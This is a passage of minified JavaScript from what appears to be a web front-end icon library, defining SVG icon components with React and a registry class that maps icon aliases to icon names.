14.1833 20.207 13.793L19.2374 12.8232L21.1161 10.9446C22.1901 9.87061 22.1901 8.12891 21.1161 7.05493L19.7374 5.67651L22.207 3.20703C22.5975 2.81641 22.5975 2.18335 22.207 1.79297C21.8164 1.40234 21.1834 1.40234 20.7929 1.79297L18.3232 4.2627L16.9443 2.88403C15.8703 1.81006 14.1295 1.81006 13.0556 2.88403L11.1768 4.7627Z",fill:"currentColor"})),unlink_link_break_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.29286 4.29325C2.68338 3.90273 3.31639 3.90273 3.70692 4.29325L10.9999 11.5862L13.7929 8.79325C14.1834 8.40273 14.8164 8.40273 15.2069 8.79325C15.5972 9.1838 15.5974 9.81687 15.2069 10.2073L12.4139 13.0003L19.7069 20.2933C20.0972 20.6838 20.0974 21.3169 19.7069 21.7073C19.3165 22.0977 18.6834 22.0976 18.2929 21.7073L14.5194 17.9339L12.204 20.2493C9.86964 22.5836 6.08522 22.5835 3.75086 20.2493C1.41651 17.915 1.41657 14.1306 3.75086 11.7962L6.06532 9.47978L2.29286 5.70732C1.90236 5.31682 1.90241 4.68379 2.29286 4.29325ZM5.16493 13.2102C3.61168 14.7636 3.61162 17.2819 5.16493 18.8352C6.71823 20.3884 9.23662 20.3884 10.7899 18.8352L13.1054 16.5198L10.9999 14.4143L10.2069 15.2073C9.81646 15.5977 9.18337 15.5976 8.79286 15.2073C8.40236 14.8168 8.40241 14.1838 8.79286 13.7933L9.58582 13.0003L7.48036 10.8948L5.16493 13.2102Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M11.7958 3.75126C14.1302 1.4169 17.9145 1.41689 20.2489 3.75126C22.5832 6.08564 22.5833 9.87005 20.2489 12.2044L17.7352 14.719C17.3449 15.1092 16.7117 15.109 16.3212 14.719C15.9307 14.3285 15.9307 13.6945 16.3212 13.304L18.8348 10.7903C20.3881 9.23703 20.3881 6.71866 18.8348 5.16533C17.2815 3.612 14.7632 3.61201 13.2098 5.16533L10.6962 7.679C10.3057 8.06941 9.67164 8.06939 9.28114 7.679C8.89103 7.28851 8.89092 6.65536 9.28114 6.26493L11.7958 3.75126Z",fill:"currentColor"})),unlocked_open_security_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1C15.3136 1.00007 18 3.68634 18 7V9.25C19.5188 9.25 20.75 10.4812 20.75 12V20C20.75 21.5188 19.5188 22.75 18 22.75H6C4.48122 22.75 3.25 21.5188 3.25 20V12C3.25 10.4812 4.48122 9.25 6 9.25H16V7C16 4.79091 14.2091 3.00007 12 3C10.5207 3.00001 9.22731 3.80281 8.53418 5.00098C8.25756 5.47873 7.6459 5.64163 7.16797 5.36523C6.69018 5.0886 6.52723 4.47697 6.80371 3.99902C7.83968 2.20846 9.77808 1.00001 12 1ZM12 14.5C11.4477 14.5 11 14.9477 11 15.5V16.5C11 17.0523 11.4477 17.5 12 17.5C12.5523 17.5 13 17.0523 13 16.5V15.5C13 14.9477 12.5523 14.5 12 14.5Z",fill:"currentColor"})),sort_ascending_order_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.25 5C2.25 3.4812 3.4812 2.25 5 2.25L19 2.25C20.5188 2.25 21.75 3.4812 21.75 5L21.75 19C21.75 20.5188 20.5188 21.75 19 21.75L5 21.75C3.4812 21.75 2.25 20.5188 2.25 19L2.25 5ZM16.75 7.5C16.75 7.08569 16.4142 6.75 16 6.75L6 6.75C5.58581 6.75 5.25 7.08569 5.25 7.5C5.25 7.91431 5.58581 8.25 6 8.25L16 8.25C16.4142 8.25 16.75 7.91431 16.75 7.5ZM11.5 11C11.9142 11 12.25 11.3357 12.25 11.75C12.25 12.1643 11.9142 12.5 11.5 12.5L6 12.5C5.58581 12.5 5.25 12.1643 5.25 11.75C5.25 11.3357 5.58581 11 6 11L11.5 11ZM10.75 16C10.75 15.5857 10.4142 15.25 10 15.25L6 15.25C5.58581 15.25 5.25 15.5857 5.25 16C5.25 16.4143 5.58581 16.75 6 16.75L10 16.75C10.4142 16.75 10.75 16.4143 10.75 16ZM15.25 11C15.25 10.5857 15.5857 10.25 16 10.25C16.4142 10.25 16.75 10.5857 16.75 11L16.75 15.1895L17.9697 13.9697C18.2626 13.6768 18.7373 13.6768 19.0303 13.9697C19.3231 14.2627 19.3231 14.7373 19.0303 15.0303L16.5303 17.5303C16.2373 17.8232 15.7626 17.8232 15.4697 17.5303L12.9697 15.0303C12.6768 14.7373 12.6768 14.2627 12.9697 13.9697C13.2626 13.6768 13.7373 13.6768 14.0303 13.9697L15.25 15.1895L15.25 11Z",fill:"currentColor"})),sort_descending_order_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 19C21.75 20.5188 20.5188 21.75 19 21.75H5C3.4812 21.75 2.25 20.5188 2.25 19V5C2.25 3.4812 3.4812 2.25 5 2.25H19C20.5188 2.25 21.75 3.4812 21.75 5V19ZM10.75 8C10.75 8.41431 10.4142 8.75 10 8.75H6C5.58582 8.75 5.25 8.41431 5.25 8C5.25 7.58569 5.58582 7.25 6 7.25H10C10.4142 7.25 10.75 7.58569 10.75 8ZM11.5 13C11.9142 13 12.25 12.6643 12.25 12.25C12.25 11.8357 11.9142 11.5 11.5 11.5H6C5.58582 11.5 5.25 11.8357 5.25 12.25C5.25 12.6643 5.58582 13 6 13H11.5ZM6 15.75H16C16.4142 15.75 16.75 16.0857 16.75 16.5C16.75 16.9143 16.4142 17.25 16 17.25H6C5.58582 17.25 5.25 16.9143 5.25 16.5C5.25 16.0857 5.58582 15.75 6 15.75ZM15.25 13V8.81055L14.0303 10.0303C13.7373 10.3232 13.2626 10.3232 12.9697 10.0303C12.6768 9.73755 12.6768 9.2627 12.9697 8.96973L15.4697 6.46973L15.5264 6.41797C15.8209 6.17773 16.2556 6.19531 16.5303 6.46973L19.0303 8.96973C19.3231 9.2627 19.3231 9.73755 19.0303 10.0303C18.7373 10.3232 18.2626 10.3232 17.9697 10.0303L16.75 8.81055V13C16.75 13.4143 16.4142 13.75 16 13.75C15.5857 13.75 15.25 13.4143 15.25 13Z",fill:"currentColor"})),plus_circle_zoom_in_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75ZM11 16.9999V12.9999H7C6.44771 12.9999 6 12.5522 6 11.9999C6.00006 11.4477 6.44775 10.9999 7 10.9999H11V6.99988C11 6.4476 11.4477 5.99988 12 5.99988C12.5523 5.99988 13 6.4476 13 6.99988V10.9999H17C17.5522 10.9999 17.9999 11.4477 18 11.9999C18 12.5522 17.5523 12.9999 17 12.9999H13V16.9999C13 17.5522 12.5523 17.9999 12 17.9999C11.4477 17.9999 11 17.5522 11 16.9999Z",fill:"currentColor"})),right_circle_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25ZM16.7372 9.67573C17.1103 9.26861 17.0828 8.63604 16.6757 8.26285C16.2686 7.88966 15.636 7.91716 15.2628 8.32428L10.4686 13.5544L8.70711 11.7929C8.31658 11.4024 7.68342 11.4024 7.29289 11.7929C6.90237 12.1834 6.90237 12.8166 7.29289 13.2071L9.79289 15.7071C9.98576 15.9 10.249 16.0057 10.5217 15.9998C10.7944 15.9938 11.0528 15.8768 11.2372 15.6757L16.7372 9.67573Z",fill:"currentColor"}))}},4766:(e,t,n)=>{"use strict";n.d(t,{ZP:()=>s});var a=n(7294),r=n(1900),o=n(4528);(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 99.964"},(0,a.createElement)("path",{d:"M97.637 61.79a3.8 3.8 0 0 1-.265-2.338c2.854-16.467-1.618-30.679-13.443-42.449A46.289 46.289 0 0 0 57.307 3.971a45.987 45.987 0 0 0-13.429.031 3.88 3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),(0,a.createElement)("svg",{viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.34084 11.3521L7.66481 13.0281C6.36891 14.324 4.26783 14.324 2.97193 13.0281C1.67602 11.7322 1.67602 9.63111 2.97193 8.33521L4.64796 6.65918M6.65916 4.64795L8.33519 2.97193C9.63109 1.67603 11.7322 1.67602 13.0281 2.97192C14.324 4.26782 14.324 6.36889 13.0281 7.66479L11.352 9.34082",stroke:"currentColor",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M6.33398 9.66665L9.66732 6.33331",stroke:"currentColor",strokeLinecap:"round"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,a.createElement)("path",{fill:"currentColor",d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,a.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,a.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,a.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,a.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,a.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,a.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,a.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const i=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};i.initializeIcons({...o.c,...r.e}),i.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_li